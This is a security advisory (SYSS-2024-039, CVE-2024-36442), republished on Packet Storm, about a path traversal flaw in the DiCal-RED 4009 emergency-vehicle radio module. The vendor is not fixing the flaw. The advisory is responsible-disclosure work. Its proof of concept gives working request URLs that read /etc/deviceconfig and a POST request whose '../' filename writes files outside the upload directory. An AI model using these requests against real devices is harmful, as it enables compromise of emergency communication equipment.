what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DiCal-RED 4009 Path Traversal

DiCal-RED 4009 Path Traversal
Posted Aug 23, 2024
Authored by Sebastian Hamann | Site syss.de

DiCal-RED version 4009 has an administrative web interface that is vulnerable to path traversal attacks in several places. The functions to download or display log files can be used to access arbitrary files on the device's file system. The upload function for new license files can be used to write files anywhere on the device's file system - possibly overwriting important system configuration files, binaries or scripts. Replacing files that are executed during system operation results in a full compromise of the whole device.

tags | exploit, web, arbitrary
advisories | CVE-2024-36442
SHA-256 | 7c7db8db22b8d44815d0c4d1894bb2b5c72cd299da13c7d7e62d1b7f68ee685e

DiCal-RED 4009 Path Traversal

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2024-039
Product: DiCal-RED
Manufacturer: Swissphone Wireless AG
Affected Version(s): Unknown
Tested Version(s): 4009
Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2024-04-16
Solution Date: None
Public Disclosure: 2024-08-20
CVE Reference: CVE-2024-36442
Author of Advisory: Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

DiCal-RED is a radio module for communication between emergency vehicles and
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity
and runs a Linux- and BusyBox-based operating system.

The manufacturer describes the product as follows (see [1]):

"The DiCal-Red radio data module reliably guides you to your destination. This
is ensured by the linking of navigation (also for the transmission of position
data) and various radio modules."

Due to a path traversal issue, the device is vulnerable to the disclosure
of arbitrary files and modification of system files, effectively leading to
remote code execution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The administrative web interface of the device is vulnerable to path traversal
attacks in several places.

The functions to download or display log files can be used to access arbitrary
files on the device's file system.
The upload function for new license files can be used to write files anywhere
on the device's file system - possibly overwriting important system
configuration files, binaries or scripts.
Replacing files that are executed during system operation results in a full
compromise of the whole device.

Note that the attacker needs to be authenticated in order to exploit these
vulnerabilities, i.e. know the administrative system password or its MD5
hash (cf. SYSS-2024-038).
However, due to another vulnerability (cf. SYSS-2024-040), authentication is
not required to display file contents.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

An attacker can download the file /etc/deviceconfig via the following URL:
http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=downloadfile&data={%22FilePath%22:%22/etc/deviceconfig%22}

Alternatively, the same file can be viewed via
http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22/etc/deviceconfig%22}

The following HTTP POST request uploads a file to the root directory (/) of
the device's file system:

POST /cgi-bin/fdmcgiwebv2.cgi?action=fileupload HTTP/1.1
Host: 192.0.2.1
Content-Length: 190
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynMcoPJ7jKTghQbK5
[...]
Cookie: QSESSIONID=[...]

------WebKitFormBoundarynMcoPJ7jKTghQbK5
Content-Disposition: form-data; name="binary"; filename="../poc.txt"
Content-Type: text/plain

PoC

------WebKitFormBoundarynMcoPJ7jKTghQbK5--


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends not running the device in an untrusted network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-29: Vulnerability discovered
2024-04-16: Vulnerability reported to manufacturer
2024-05-10: Manufacturer states that the vulnerability will not be fixed
2024-05-14: Vulnerability reported to CERT-Bund
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL
2024-08-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for DiCal-RED
https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/
[2] SySS Security Advisory SYSS-2024-039
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-039.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc
Key ID: 0x9CE0E440429D8B96
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd
i5Z0/Q//URU2aC1Di8bK/CntBDFfjMk+fD0nXKwo7C/GSOy41y7xBlz9e9UzJKPP
fI7fa8RQkbZDlDzpTQHXbvpSocbahWIM62B+c7uGm1EGZyejn7IpJUSbhRZHzKqM
sNukpHq10p/AA6BJn4baFgfFIdV+HzXPAm3bkxovL3pUmMYVgFsfzuzpZ3wOqKbn
M276mEmsBDG2Yi7HqWetqtYAjb35DVokrug+uT8DDe3SSE9V16iqo8EqMqMBXD7L
aCvVnnVl1ElqJSsIyClyXLoKLcWbBN4zAUlb6f90PEeUtNt5/qhRiLDzprum8BYo
7DhMz8MwOTTijNKRcYpVkOfPg1htmdUe5JqElktGcfNDj5YvU4KzG89srigHreJP
yIVM+J0VX4fQ28cjKTS/qyXOAeIqJq//3/vbsgA3YNlP+IPBZYav8//HEPJD1PiD
fBlwhQ7skn/EaCBi8EMatu7/xymA34rnTmmqS5+MCViWcTTB2+fF7H2xhZl1biHD
DcVMVGgbNAdRIYFkJAh6qg0sXd1VOb8etAhFRQmMt5MeSK+ErbAIiaWTot2wwvbS
jbTsEG+VL0HTIfEI/utghGDB+044hJceEyaqRJ/qq/3Zx1C13ZsKLPeXZaMoeEWM
1nYLOJFL/R/i+UjFsFzxDG/IcbionJYOTvULa4vPafdZQ6Yol80=
=BeZD
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close